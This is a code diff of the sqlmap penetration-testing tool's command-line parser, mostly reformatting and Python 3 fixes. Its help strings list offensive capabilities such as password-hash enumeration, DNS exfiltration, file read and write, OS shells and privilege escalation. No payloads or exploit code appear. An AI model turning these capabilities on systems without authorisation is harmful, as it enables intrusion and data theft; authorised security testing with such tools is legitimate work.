||||||
|
|
||||||
request.add_option("--timeout", dest="timeout", type="float",
|
request.add_option("--timeout", dest="timeout", type="float",
|
||||||
help="Seconds to wait before timeout connection "
|
help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)
|
||||||
"(default %d)" % defaults.timeout)
|
|
||||||
|
|
||||||
request.add_option("--retries", dest="retries", type="int",
|
request.add_option("--retries", dest="retries", type="int",
|
||||||
help="Retries when the connection timeouts "
|
help="Retries when the connection timeouts (default %d)" % defaults.retries)
|
||||||
"(default %d)" % defaults.retries)
|
|
||||||
|
|
||||||
request.add_option("--randomize", dest="rParam",
|
request.add_option("--randomize", dest="rParam",
|
||||||
help="Randomly change value for given parameter(s)")
|
help="Randomly change value for given parameter(s)")
|
||||||
@@ -211,54 +202,45 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
||||||
help="Test requests between two visits to a given safe URL")
|
help="Test requests between two visits to a given safe URL")
|
||||||
|
|
||||||
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Skip URL encoding of payload data")
|
help="Skip URL encoding of payload data")
|
||||||
|
|
||||||
request.add_option("--csrf-token", dest="csrfToken",
|
request.add_option("--csrf-token", dest="csrfToken",
|
||||||
help="Parameter used to hold anti-CSRF token")
|
help="Parameter used to hold anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--csrf-url", dest="csrfUrl",
|
request.add_option("--csrf-url", dest="csrfUrl",
|
||||||
help="URL address to visit to extract anti-CSRF token")
|
help="URL address to visit for extraction of anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--force-ssl", dest="forceSSL",
|
request.add_option("--force-ssl", dest="forceSSL", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
request.add_option("--hpp", dest="hpp",
|
request.add_option("--hpp", dest="hpp", action="store_true",
|
||||||
action="store_true",
|
help="Use HTTP parameter pollution method")
|
||||||
help="Use HTTP parameter pollution method")
|
|
||||||
|
|
||||||
request.add_option("--eval", dest="evalCode",
|
request.add_option("--eval", dest="evalCode",
|
||||||
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
||||||
|
|
||||||
# Optimization options
|
# Optimization options
|
||||||
optimization = OptionGroup(parser, "Optimization", "These "
|
optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
|
||||||
"options can be used to optimize the "
|
|
||||||
"performance of sqlmap")
|
|
||||||
|
|
||||||
optimization.add_option("-o", dest="optimize",
|
optimization.add_option("-o", dest="optimize", action="store_true",
|
||||||
action="store_true",
|
help="Turn on all optimization switches")
|
||||||
help="Turn on all optimization switches")
|
|
||||||
|
|
||||||
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
||||||
help="Predict common queries output")
|
help="Predict common queries output")
|
||||||
|
|
||||||
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
||||||
help="Use persistent HTTP(s) connections")
|
help="Use persistent HTTP(s) connections")
|
||||||
|
|
||||||
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
||||||
help="Retrieve page length without actual HTTP response body")
|
help="Retrieve page length without actual HTTP response body")
|
||||||
|
|
||||||
optimization.add_option("--threads", dest="threads", type="int",
|
optimization.add_option("--threads", dest="threads", type="int",
|
||||||
help="Max number of concurrent HTTP(s) "
|
help="Max number of concurrent HTTP(s) "
|
||||||
"requests (default %d)" % defaults.threads)
|
"requests (default %d)" % defaults.threads)
|
||||||
|
|
||||||
# Injection options
|
# Injection options
|
||||||
injection = OptionGroup(parser, "Injection", "These options can be "
|
injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
|
||||||
"used to specify which parameters to test "
|
|
||||||
"for, provide custom injection payloads and "
|
|
||||||
"optional tampering scripts")
|
|
||||||
|
|
||||||
injection.add_option("-p", dest="testParameter",
|
injection.add_option("-p", dest="testParameter",
|
||||||
help="Testable parameter(s)")
|
help="Testable parameter(s)")
|
||||||
@@ -270,36 +252,30 @@ def cmdLineParser(argv=None):
|
|||||||
help="Skip testing parameters that not appear to be dynamic")
|
help="Skip testing parameters that not appear to be dynamic")
|
||||||
|
|
||||||
injection.add_option("--param-exclude", dest="paramExclude",
|
injection.add_option("--param-exclude", dest="paramExclude",
|
||||||
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
||||||
|
|
||||||
injection.add_option("--dbms", dest="dbms",
|
injection.add_option("--dbms", dest="dbms",
|
||||||
help="Force back-end DBMS to this value")
|
help="Force back-end DBMS to provided value")
|
||||||
|
|
||||||
injection.add_option("--dbms-cred", dest="dbmsCred",
|
injection.add_option("--dbms-cred", dest="dbmsCred",
|
||||||
help="DBMS authentication credentials (user:password)")
|
help="DBMS authentication credentials (user:password)")
|
||||||
|
|
||||||
injection.add_option("--os", dest="os",
|
injection.add_option("--os", dest="os",
|
||||||
help="Force back-end DBMS operating system "
|
help="Force back-end DBMS operating system to provided value")
|
||||||
"to this value")
|
|
||||||
|
|
||||||
injection.add_option("--invalid-bignum", dest="invalidBignum",
|
injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use big numbers for invalidating values")
|
help="Use big numbers for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-logical", dest="invalidLogical",
|
injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use logical operations for invalidating values")
|
help="Use logical operations for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-string", dest="invalidString",
|
injection.add_option("--invalid-string", dest="invalidString", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use random strings for invalidating values")
|
help="Use random strings for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--no-cast", dest="noCast",
|
injection.add_option("--no-cast", dest="noCast", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off payload casting mechanism")
|
help="Turn off payload casting mechanism")
|
||||||
|
|
||||||
injection.add_option("--no-escape", dest="noEscape",
|
injection.add_option("--no-escape", dest="noEscape", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off string escaping mechanism")
|
help="Turn off string escaping mechanism")
|
||||||
|
|
||||||
injection.add_option("--prefix", dest="prefix",
|
injection.add_option("--prefix", dest="prefix",
|
||||||
@@ -312,54 +288,40 @@ def cmdLineParser(argv=None):
 help="Use given script(s) for tampering injection data")

 # Detection options
-detection = OptionGroup(parser, "Detection", "These options can be "
-"used to customize the detection phase")
+detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")

 detection.add_option("--level", dest="level", type="int",
-help="Level of tests to perform (1-5, "
-"default %d)" % defaults.level)
+help="Level of tests to perform (1-5, default %d)" % defaults.level)

 detection.add_option("--risk", dest="risk", type="int",
-help="Risk of tests to perform (1-3, "
-"default %d)" % defaults.risk)
+help="Risk of tests to perform (1-3, default %d)" % defaults.risk)

 detection.add_option("--string", dest="string",
-help="String to match when "
-"query is evaluated to True")
+help="String to match when query is evaluated to True")

 detection.add_option("--not-string", dest="notString",
-help="String to match when "
-"query is evaluated to False")
+help="String to match when query is evaluated to False")

 detection.add_option("--regexp", dest="regexp",
-help="Regexp to match when "
-"query is evaluated to True")
+help="Regexp to match when query is evaluated to True")

 detection.add_option("--code", dest="code", type="int",
-help="HTTP code to match when "
-"query is evaluated to True")
+help="HTTP code to match when query is evaluated to True")

-detection.add_option("--text-only", dest="textOnly",
-action="store_true",
+detection.add_option("--text-only", dest="textOnly", action="store_true",
 help="Compare pages based only on the textual content")

-detection.add_option("--titles", dest="titles",
-action="store_true",
+detection.add_option("--titles", dest="titles", action="store_true",
 help="Compare pages based only on their titles")

 # Techniques options
-techniques = OptionGroup(parser, "Techniques", "These options can be "
-"used to tweak testing of specific SQL "
-"injection techniques")
+techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")

 techniques.add_option("--technique", dest="tech",
-help="SQL injection techniques to use "
-"(default \"%s\")" % defaults.tech)
+help="SQL injection techniques to use (default \"%s\")" % defaults.tech)

-techniques.add_option("--time-sec", dest="timeSec",
-type="int",
-help="Seconds to delay the DBMS response "
-"(default %d)" % defaults.timeSec)
+techniques.add_option("--time-sec", dest="timeSec", type="int",
+help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)

 techniques.add_option("--union-cols", dest="uCols",
 help="Range of columns to test for UNION query SQL injection")
@@ -373,59 +335,49 @@ def cmdLineParser(argv=None):
 techniques.add_option("--dns-domain", dest="dnsDomain",
 help="Domain name used for DNS exfiltration attack")

-techniques.add_option("--second-order", dest="secondOrder",
-help="Resulting page URL searched for second-order "
-"response")
+techniques.add_option("--second-url", dest="secondUrl",
+help="Resulting page URL searched for second-order response")
+
+techniques.add_option("--second-req", dest="secondReq",
+help="Load second-order HTTP request from file")

 # Fingerprint options
 fingerprint = OptionGroup(parser, "Fingerprint")

-fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
-action="store_true",
+fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true",
 help="Perform an extensive DBMS version fingerprint")

 # Enumeration options
-enumeration = OptionGroup(parser, "Enumeration", "These options can "
-"be used to enumerate the back-end database "
-"management system information, structure "
-"and data contained in the tables. Moreover "
-"you can run your own SQL statements")
+enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")

-enumeration.add_option("-a", "--all", dest="getAll",
-action="store_true", help="Retrieve everything")
+enumeration.add_option("-a", "--all", dest="getAll", action="store_true",
+help="Retrieve everything")

-enumeration.add_option("-b", "--banner", dest="getBanner",
-action="store_true", help="Retrieve DBMS banner")
+enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true",
+help="Retrieve DBMS banner")

-enumeration.add_option("--current-user", dest="getCurrentUser",
-action="store_true",
+enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true",
 help="Retrieve DBMS current user")

-enumeration.add_option("--current-db", dest="getCurrentDb",
-action="store_true",
+enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true",
 help="Retrieve DBMS current database")

-enumeration.add_option("--hostname", dest="getHostname",
-action="store_true",
+enumeration.add_option("--hostname", dest="getHostname", action="store_true",
 help="Retrieve DBMS server hostname")

-enumeration.add_option("--is-dba", dest="isDba",
-action="store_true",
+enumeration.add_option("--is-dba", dest="isDba", action="store_true",
 help="Detect if the DBMS current user is DBA")

 enumeration.add_option("--users", dest="getUsers", action="store_true",
 help="Enumerate DBMS users")

-enumeration.add_option("--passwords", dest="getPasswordHashes",
-action="store_true",
+enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true",
 help="Enumerate DBMS users password hashes")

-enumeration.add_option("--privileges", dest="getPrivileges",
-action="store_true",
+enumeration.add_option("--privileges", dest="getPrivileges", action="store_true",
 help="Enumerate DBMS users privileges")

-enumeration.add_option("--roles", dest="getRoles",
-action="store_true",
+enumeration.add_option("--roles", dest="getRoles", action="store_true",
 help="Enumerate DBMS users roles")

 enumeration.add_option("--dbs", dest="getDbs", action="store_true",
@@ -453,7 +405,7 @@ def cmdLineParser(argv=None):
 help="Search column(s), table(s) and/or database name(s)")

 enumeration.add_option("--comments", dest="getComments", action="store_true",
-help="Retrieve DBMS comments")
+help="Check for DBMS comments during enumeration")

 enumeration.add_option("-D", dest="db",
 help="DBMS database to enumerate")
@@ -464,16 +416,14 @@ def cmdLineParser(argv=None):
 enumeration.add_option("-C", dest="col",
 help="DBMS database table column(s) to enumerate")

-enumeration.add_option("-X", dest="excludeCol",
-help="DBMS database table column(s) to not enumerate")
+enumeration.add_option("-X", dest="exclude",
+help="DBMS database identifier(s) to not enumerate")

 enumeration.add_option("-U", dest="user",
 help="DBMS user to enumerate")

-enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
-action="store_true",
-help="Exclude DBMS system databases when "
-"enumerating tables")
+enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true",
+help="Exclude DBMS system databases when enumerating tables")

 enumeration.add_option("--pivot-column", dest="pivotColumn",
 help="Pivot column name")
@@ -496,28 +446,23 @@ def cmdLineParser(argv=None):
 enumeration.add_option("--sql-query", dest="query",
 help="SQL statement to be executed")

-enumeration.add_option("--sql-shell", dest="sqlShell",
-action="store_true",
+enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true",
 help="Prompt for an interactive SQL shell")

 enumeration.add_option("--sql-file", dest="sqlFile",
 help="Execute SQL statements from given file(s)")

 # Brute force options
-brute = OptionGroup(parser, "Brute force", "These "
-"options can be used to run brute force "
-"checks")
+brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")

 brute.add_option("--common-tables", dest="commonTables", action="store_true",
 help="Check existence of common tables")

 brute.add_option("--common-columns", dest="commonColumns", action="store_true",
 help="Check existence of common columns")

 # User-defined function options
-udf = OptionGroup(parser, "User-defined function injection", "These "
-"options can be used to create custom user-defined "
-"functions")
+udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")

 udf.add_option("--udf-inject", dest="udfInject", action="store_true",
 help="Inject custom user-defined functions")
@@ -526,167 +471,131 @@ def cmdLineParser(argv=None):
 help="Local path of the shared library")

 # File system options
-filesystem = OptionGroup(parser, "File system access", "These options "
-"can be used to access the back-end database "
-"management system underlying file system")
+filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")

-filesystem.add_option("--file-read", dest="rFile",
-help="Read a file from the back-end DBMS "
-"file system")
+filesystem.add_option("--file-read", dest="fileRead",
+help="Read a file from the back-end DBMS file system")

-filesystem.add_option("--file-write", dest="wFile",
-help="Write a local file on the back-end "
-"DBMS file system")
+filesystem.add_option("--file-write", dest="fileWrite",
+help="Write a local file on the back-end DBMS file system")

-filesystem.add_option("--file-dest", dest="dFile",
-help="Back-end DBMS absolute filepath to "
-"write to")
+filesystem.add_option("--file-dest", dest="fileDest",
+help="Back-end DBMS absolute filepath to write to")

 # Takeover options
-takeover = OptionGroup(parser, "Operating system access", "These "
-"options can be used to access the back-end "
-"database management system underlying "
-"operating system")
+takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")

 takeover.add_option("--os-cmd", dest="osCmd",
 help="Execute an operating system command")

-takeover.add_option("--os-shell", dest="osShell",
-action="store_true",
-help="Prompt for an interactive operating "
-"system shell")
+takeover.add_option("--os-shell", dest="osShell", action="store_true",
+help="Prompt for an interactive operating system shell")

-takeover.add_option("--os-pwn", dest="osPwn",
-action="store_true",
-help="Prompt for an OOB shell, "
-"Meterpreter or VNC")
+takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
+help="Prompt for an OOB shell, Meterpreter or VNC")

-takeover.add_option("--os-smbrelay", dest="osSmb",
-action="store_true",
-help="One click prompt for an OOB shell, "
-"Meterpreter or VNC")
+takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
+help="One click prompt for an OOB shell, Meterpreter or VNC")

-takeover.add_option("--os-bof", dest="osBof",
-action="store_true",
+takeover.add_option("--os-bof", dest="osBof", action="store_true",
 help="Stored procedure buffer overflow "
 "exploitation")

-takeover.add_option("--priv-esc", dest="privEsc",
-action="store_true",
+takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
 help="Database process user privilege escalation")

 takeover.add_option("--msf-path", dest="msfPath",
-help="Local path where Metasploit Framework "
-"is installed")
+help="Local path where Metasploit Framework is installed")

 takeover.add_option("--tmp-path", dest="tmpPath",
-help="Remote absolute path of temporary files "
-"directory")
+help="Remote absolute path of temporary files directory")

 # Windows registry options
-windows = OptionGroup(parser, "Windows registry access", "These "
-"options can be used to access the back-end "
-"database management system Windows "
-"registry")
+windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")

-windows.add_option("--reg-read", dest="regRead",
-action="store_true",
+windows.add_option("--reg-read", dest="regRead", action="store_true",
 help="Read a Windows registry key value")

-windows.add_option("--reg-add", dest="regAdd",
-action="store_true",
+windows.add_option("--reg-add", dest="regAdd", action="store_true",
 help="Write a Windows registry key value data")

-windows.add_option("--reg-del", dest="regDel",
-action="store_true",
+windows.add_option("--reg-del", dest="regDel", action="store_true",
 help="Delete a Windows registry key value")

 windows.add_option("--reg-key", dest="regKey",
 help="Windows registry key")

 windows.add_option("--reg-value", dest="regVal",
 help="Windows registry key value")

 windows.add_option("--reg-data", dest="regData",
 help="Windows registry key value data")

 windows.add_option("--reg-type", dest="regType",
 help="Windows registry key value type")

 # General options
-general = OptionGroup(parser, "General", "These options can be used "
-"to set some general working parameters")
+general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")

 general.add_option("-s", dest="sessionFile",
 help="Load session from a stored (.sqlite) file")

 general.add_option("-t", dest="trafficFile",
-help="Log all HTTP traffic into a "
-"textual file")
+help="Log all HTTP traffic into a textual file")

-general.add_option("--batch", dest="batch",
-action="store_true",
-help="Never ask for user input, use the default behaviour")
+general.add_option("--batch", dest="batch", action="store_true",
+help="Never ask for user input, use the default behavior")

 general.add_option("--binary-fields", dest="binaryFields",
 help="Result fields having binary values (e.g. \"digest\")")

-general.add_option("--check-internet", dest="checkInternet",
-action="store_true",
+general.add_option("--check-internet", dest="checkInternet", action="store_true",
 help="Check Internet connection before assessing the target")

 general.add_option("--crawl", dest="crawlDepth", type="int",
 help="Crawl the website starting from the target URL")

 general.add_option("--crawl-exclude", dest="crawlExclude",
 help="Regexp to exclude pages from crawling (e.g. \"logout\")")

 general.add_option("--csv-del", dest="csvDel",
-help="Delimiting character used in CSV output "
-"(default \"%s\")" % defaults.csvDel)
+help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)

 general.add_option("--charset", dest="charset",
 help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")

 general.add_option("--dump-format", dest="dumpFormat",
 help="Format of dumped data (CSV (default), HTML or SQLITE)")

 general.add_option("--encoding", dest="encoding",
 help="Character encoding used for data retrieval (e.g. GBK)")

-general.add_option("--eta", dest="eta",
-action="store_true",
+general.add_option("--eta", dest="eta", action="store_true",
 help="Display for each output the estimated time of arrival")

-general.add_option("--flush-session", dest="flushSession",
-action="store_true",
+general.add_option("--flush-session", dest="flushSession", action="store_true",
 help="Flush session files for current target")

-general.add_option("--forms", dest="forms",
-action="store_true",
+general.add_option("--forms", dest="forms", action="store_true",
 help="Parse and test forms on target URL")

-general.add_option("--fresh-queries", dest="freshQueries",
-action="store_true",
+general.add_option("--fresh-queries", dest="freshQueries", action="store_true",
 help="Ignore query results stored in session file")

 general.add_option("--har", dest="harFile",
 help="Log all HTTP traffic into a HAR file")

-general.add_option("--hex", dest="hexConvert",
-action="store_true",
-help="Use DBMS hex function(s) for data retrieval")
+general.add_option("--hex", dest="hexConvert", action="store_true",
+help="Use hex conversion during data retrieval")

-general.add_option("--output-dir", dest="outputDir",
-action="store",
+general.add_option("--output-dir", dest="outputDir", action="store",
 help="Custom output directory path")

-general.add_option("--parse-errors", dest="parseErrors",
-action="store_true",
+general.add_option("--parse-errors", dest="parseErrors", action="store_true",
 help="Parse and display DBMS error messages from responses")

 general.add_option("--save", dest="saveConfig",
 help="Save options to a configuration INI file")

 general.add_option("--scope", dest="scope",
 help="Regexp to filter targets from provided proxy log")
@@ -697,79 +606,74 @@ def cmdLineParser(argv=None):
 general.add_option("--test-skip", dest="testSkip",
 help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")

-general.add_option("--update", dest="updateAll",
-action="store_true",
+general.add_option("--update", dest="updateAll", action="store_true",
 help="Update sqlmap")

 # Miscellaneous options
 miscellaneous = OptionGroup(parser, "Miscellaneous")

 miscellaneous.add_option("-z", dest="mnemonics",
 help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")

 miscellaneous.add_option("--alert", dest="alert",
 help="Run host OS command(s) when SQL injection is found")

 miscellaneous.add_option("--answers", dest="answers",
-help="Set question answers (e.g. \"quit=N,follow=N\")")
+help="Set predefined answers (e.g. \"quit=N,follow=N\")")

 miscellaneous.add_option("--beep", dest="beep", action="store_true",
 help="Beep on question and/or when SQL injection is found")

-miscellaneous.add_option("--cleanup", dest="cleanup",
-action="store_true",
-help="Clean up the DBMS from sqlmap specific "
-"UDF and tables")
+miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
+help="Clean up the DBMS from sqlmap specific UDF and tables")

-miscellaneous.add_option("--dependencies", dest="dependencies",
-action="store_true",
-help="Check for missing (non-core) sqlmap dependencies")
+miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true",
+help="Check for missing (optional) sqlmap dependencies")

-miscellaneous.add_option("--disable-coloring", dest="disableColoring",
-action="store_true",
+miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true",
 help="Disable console output coloring")

 miscellaneous.add_option("--gpage", dest="googlePage", type="int",
 help="Use Google dork results from specified page number")

-miscellaneous.add_option("--identify-waf", dest="identifyWaf",
-action="store_true",
-help="Make a thorough testing for a WAF/IPS/IDS protection")
+miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
+help="Make a thorough testing for a WAF/IPS protection")

-miscellaneous.add_option("--mobile", dest="mobile",
-action="store_true",
-help="Imitate smartphone through HTTP User-Agent header")
+miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true",
+help="Display list of available tamper scripts")

-miscellaneous.add_option("--offline", dest="offline",
-action="store_true",
-help="Work in offline mode (only use session data)")
+miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
+help="Imitate smartphone through HTTP User-Agent header")

-miscellaneous.add_option("--purge-output", dest="purgeOutput",
-action="store_true",
-help="Safely remove all content from output directory")
+miscellaneous.add_option("--offline", dest="offline", action="store_true",
+help="Work in offline mode (only use session data)")

-miscellaneous.add_option("--skip-waf", dest="skipWaf",
-action="store_true",
-help="Skip heuristic detection of WAF/IPS/IDS protection")
+miscellaneous.add_option("--purge", dest="purge", action="store_true",
+help="Safely remove all content from sqlmap data directory")

-miscellaneous.add_option("--smart", dest="smart",
-action="store_true",
-help="Conduct thorough tests only if positive heuristic(s)")
+miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
+help="Skip heuristic detection of WAF/IPS protection")
+
+miscellaneous.add_option("--smart", dest="smart", action="store_true",
+help="Conduct thorough tests only if positive heuristic(s)")

 miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
 help="Prompt for an interactive sqlmap shell")

 miscellaneous.add_option("--tmp-dir", dest="tmpDir",
 help="Local directory for storing temporary files")

 miscellaneous.add_option("--web-root", dest="webRoot",
 help="Web server document root directory (e.g. \"/var/www\")")

-miscellaneous.add_option("--wizard", dest="wizard",
-action="store_true",
+miscellaneous.add_option("--wizard", dest="wizard", action="store_true",
 help="Simple wizard interface for beginner users")

 # Hidden and/or experimental options
+parser.add_option("--crack", dest="hashFile",
+help=SUPPRESS_HELP)
+# help="Load and crack hashes from a file (standalone)")

 parser.add_option("--dummy", dest="dummy", action="store_true",
 help=SUPPRESS_HELP)
@@ -791,6 +695,9 @@ def cmdLineParser(argv=None):
 parser.add_option("--force-dns", dest="forceDns", action="store_true",
 help=SUPPRESS_HELP)

+parser.add_option("--force-pivoting", dest="forcePivoting", action="store_true",
+help=SUPPRESS_HELP)
+
 parser.add_option("--force-threads", dest="forceThreads", action="store_true",
 help=SUPPRESS_HELP)

@@ -852,6 +759,7 @@ def cmdLineParser(argv=None):
 prompt = False
 advancedHelp = True
 extraHeaders = []
+tamperIndex = None

 # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
 for arg in argv:
@@ -886,7 +794,7 @@ def cmdLineParser(argv=None):
 command = raw_input("sqlmap-shell> ").strip()
 command = getUnicode(command, encoding=sys.stdin.encoding)
 except (KeyboardInterrupt, EOFError):
-print
+print()
 raise SqlmapShellQuitException

 if not command:
@@ -908,8 +816,8 @@ def cmdLineParser(argv=None):
 try:
 for arg in shlex.split(command):
 argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
-except ValueError, ex:
-raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
+except ValueError as ex:
+raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % ex.message)

 for i in xrange(len(argv)):
 if argv[i] == "-hh":
@@ -923,6 +831,12 @@ def cmdLineParser(argv=None):
 elif re.search(r"\A-\w=.+", argv[i]):
 dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i])
 raise SystemExit
+elif argv[i].startswith("--tamper"):
+if tamperIndex is None:
+tamperIndex = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None)
+else:
+argv[tamperIndex] = "%s,%s" % (argv[tamperIndex], argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else ""))
+argv[i] = ""
 elif argv[i] == "-H":
 if i + 1 < len(argv):
 extraHeaders.append(argv[i + 1])
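The block added in the hunk above folds repeated `--tamper` switches into a single comma-separated value before the option parser ever sees them. Below is a minimal, hedged sketch of the same idea as a standalone helper; `merge_tamper_args()` is a hypothetical name used only for illustration and is not sqlmap's actual code.

```python
# Illustrative sketch only: collapse repeated "--tamper" occurrences in an argv
# list into one comma-separated value, as the hunk above does.
def merge_tamper_args(argv):
    merged = list(argv)
    tamper_index = None

    for i, arg in enumerate(merged):
        if not arg.startswith("--tamper"):
            continue
        # Value is either attached ("--tamper=space2comment") or the next token
        value = arg.split('=', 1)[1] if '=' in arg else (merged[i + 1] if i + 1 < len(merged) and not merged[i + 1].startswith('-') else "")
        if tamper_index is None:
            # Remember where the first tamper value lives so later ones can be appended
            tamper_index = i if '=' in arg else i + 1
        else:
            merged[tamper_index] = "%s,%s" % (merged[tamper_index], value)
            merged[i] = ""                       # blank out the duplicate switch
            if '=' not in arg and i + 1 < len(merged):
                merged[i + 1] = ""               # and its detached value token

    return [_ for _ in merged if _ != ""]

# Example: both spellings end up as a single "--tamper space2comment,between"
print(merge_tamper_args(["-u", "http://www.example.com/?id=1", "--tamper", "space2comment", "--tamper=between"]))
```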
@@ -930,7 +844,7 @@ def cmdLineParser(argv=None):
 argv[i] = argv[i][:-1]
 conf.skipThreadCheck = True
 elif argv[i] == "--version":
-print VERSION_STRING.split('/')[-1]
+print(VERSION_STRING.split('/')[-1])
 raise SystemExit
 elif argv[i] in ("-h", "--help"):
 advancedHelp = False
@@ -954,7 +868,7 @@ def cmdLineParser(argv=None):

 try:
 (args, _) = parser.parse_args(argv)
-except UnicodeEncodeError, ex:
+except UnicodeEncodeError as ex:
 dataToStdout("\n[!] %s\n" % ex.object.encode("unicode-escape"))
 raise SystemExit
 except SystemExit:
@@ -976,17 +890,15 @@ def cmdLineParser(argv=None):
 if args.dummy:
 args.url = args.url or DUMMY_URL

-if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
-args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
-args.purgeOutput, args.sitemapUrl)):
-errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
-errMsg += "use -h for basic or -hh for advanced help\n"
+if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers, args.hashFile)):
+errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). "
+errMsg += "Use -h for basic and -hh for advanced help\n"
 parser.error(errMsg)

 return args

-except (OptionError, TypeError), e:
-parser.error(e)
+except (OptionError, TypeError) as ex:
+parser.error(ex)

 except SystemExit:
 # Protection against Windows dummy double clicking
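Most of the hunks above are mechanical: `action="store_true"` is hoisted onto the `add_option()` call line and multi-line help strings are joined into one. For readers unfamiliar with the `optparse` API this parser is built on, here is a minimal, self-contained sketch of the same pattern; the option names and defaults below are only examples, not sqlmap's real interface.

```python
# Minimal optparse sketch of the pattern used throughout the parser above:
# option groups plus add_option() calls with the whole signature on one line.
from optparse import OptionParser, OptionGroup

parser = OptionParser(usage="usage: %prog [options]")

detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
detection.add_option("--level", dest="level", type="int", default=1,
                     help="Level of tests to perform (1-5, default %default)")
detection.add_option("--text-only", dest="textOnly", action="store_true",
                     help="Compare pages based only on the textual content")
parser.add_option_group(detection)

options, args = parser.parse_args(["--level", "3", "--text-only"])
print("%s %s" % (options.level, options.textOnly))   # 3 True
```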
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -39,7 +39,7 @@ def configFileProxy(section, option, datatype):
 value = config.getfloat(section, option) if config.get(section, option) else 0.0
 else:
 value = config.get(section, option)
-except ValueError, ex:
+except ValueError as ex:
